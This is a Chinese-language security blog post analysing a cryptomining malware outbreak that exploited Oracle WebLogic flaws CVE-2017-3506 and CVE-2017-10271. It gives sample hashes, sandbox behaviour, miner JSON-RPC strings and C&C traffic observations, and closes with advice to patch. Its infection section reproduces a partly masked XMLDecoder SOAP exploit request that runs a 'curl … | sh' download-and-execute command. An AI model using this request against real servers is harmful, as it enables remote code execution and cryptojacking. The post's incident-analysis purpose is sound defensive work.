關於這幾天挖礦的事兒

0x00 前言

首先先跟大家道個歉，最近事情真的是有點太多了，對於挖礦這個事兒po的有限。

這次挖礦病毒泛濫的罪魁禍首其實是CVE-2017-3506。

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. nnDifficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. nnCVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).n

這個洞其實不是一個新的洞，很早之前就被披露了，但是大家都沒有修復漏洞的意識，所以導致挖礦病毒這次好多人都沒倖免，這個漏洞的具體分析，我的好基友晴天老師已經發布了相關的分析，安全客 - 有思想的安全新媒體，大家可以去這裡看晴天老師的masterpiece。

其實這篇文章，我主要是想說點別的事兒。

0x01 關於挖礦病毒的事兒

這個病毒其實在這周開始的時候就有所端倪，首先是我在混進的一個群里，大量甲方的童鞋在抱怨這個問題，關鍵抱怨的人裡面有一位重量級的人物直接找到了我，於是這一周我都在跟這件事兒較勁，沒有時間PR。

樣本我這邊抓到了兩個（實際上是三個，其中有兩個名字都為Carbon，大寫的Carbon是ELF64，小寫的carbon是ELF），中招的時候大多數情況大多數都是裝了Weblogic服務，也有部分Windows系統中招的。

我們拿小carbon做例子：

利用漏洞：CVE-2017-3506、CVE-2017-10271，也有SSH暴力破解攻擊的跡象

樣本md5：153b63f648f3d056a298362b037e5045

樣本SHA-1：7c57c61664f2b2373f755f22db9c156a1ca80849

樣本ssdeep：49152:fBKSlSOzeF/y5hfvh0FZTMjAm7lFdMVLN7:fPtzGehfvh0FZTXr3

疑似利用工具：8494482c4c24bxxxxxx439f0712a6e4、3b3e0bb6fc0e027161xxxxxxx3d27、276816bb4622693xxxxxxxx9142d26d

這個樣本應該是最早接觸到的，實際上丟沙箱跑了一下，感覺也沒啥。

病毒操作的文件：n/sys/devices/system/cpu/onlinen/dev/nulln/etc/resolv.confn/etc/nsswitch.confn/etc/ld.so.cachen/lib/i386-linux-gnu/libnss_files.so.2n/lib/i386-linux-gnu/libc.so.6n/lib/i386-linux-gnu/ld-linux.so.2n/etc/host.confn/etc/hostsn/lib/i386-linux-gnu/libnss_dns.so.2n/lib/i386-linux-gnu/libresolv.so.2n進程創建：n/tmp/EB93A6/996E.elfn進程結束：n/lib/systemd/systemd-udevd --daemonn通信地址：n216.58.203.46:80n樣本編譯平台與時間：nMicrosoft Windows Operating System 10.0.15001.0n built on Nov 14 2017 with GCCn

從這個樣本可見，這個挖礦病毒的作者水平並不高，因為這個樣本水平真的，沒有做任何代碼防護措施，沒有加殼子，沒有代碼對抗機制，沒有混淆，我還是覺得這個作者應該是來自於國內，不像是國外黑客所為，此外根據nosec那邊的微信，我也覺得還是國內的人乾的事兒。

實際上病毒在檢測礦工存活性的時候，還是通過JSON去進行通信的。

註冊礦工：nsub_8198A10((int)a1 + 2162, 768, 1, 768, "{"id":%llu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s"," ""result":"%s"}}n", qword_8264088, (char *)a1 + 2098, a2 + 1, &v27, &v29);n檢測礦工存活性：nsub_8198A10(*a1 + 2162, 768, 1, 768, "{"id":%lld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}n", qword_8264088, *a1 + 2098);n

感染的方式，其實就是遠程執行了命令：

POST /wls-wsat/****** HTTP/1.1nHost: ******：*****nAccept-Encoding: identitynContent-Length: 688nAccept-Language: zh-CN,zh;q=0.8nAccept: */*nUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0nAccept-Charset: GBK,utf-8;q=0.7,*;q=0.3nConnection: keep-alivenReferer: http://www.*******.comnCache-Control: max-age=0nContent-Type: text/xmlnX-Forwarded-For: *********nn<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">n <soapenv:Header>n<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">n<java version="1.8.0_131" class="java.beans.XMLDecoder">n<void class="java.lang.ProcessBuilder">n。。。n<string>curl *****/setup-watch|sh</string>n。。。n</soapenv:Header>n<soapenv:Body/>n</soapenv:Envelope>n

除此之外不想說啥

0x02 背後的東西

個人通過akamai的數據看到了C&C在12月8日-10日之間有一個流量驟停，然後流量變化激增，所以我覺得這台C&C伺服器應該是被擼了之後當遠控的。

而分發伺服器（xxxxx:xxx/carbon裡面的地址）在12月17日有一個明顯的流量抖動，猛漲了100多個tcp session。

礦池域名在19、20兩天有一個比較大的流量解析抖動，最高的解析次數達到了11w次，然後大家都知道發生了什麼了。

由於某些數據都是RiskIQ、Akamai後面的數據，所以不便於跟大家分享，最後貼一個攻擊者大概的規模吧。

0x03 想說的話

這種事情屬於人禍，建議大家還是好好地去安裝更新，不要不把安全更新當飯吃，這個漏洞很早就被修復了，由於大家都不打補丁，所以變成了這樣。

上面分析的不詳細，所以還請擔待，因為有些話我真的不太方便說。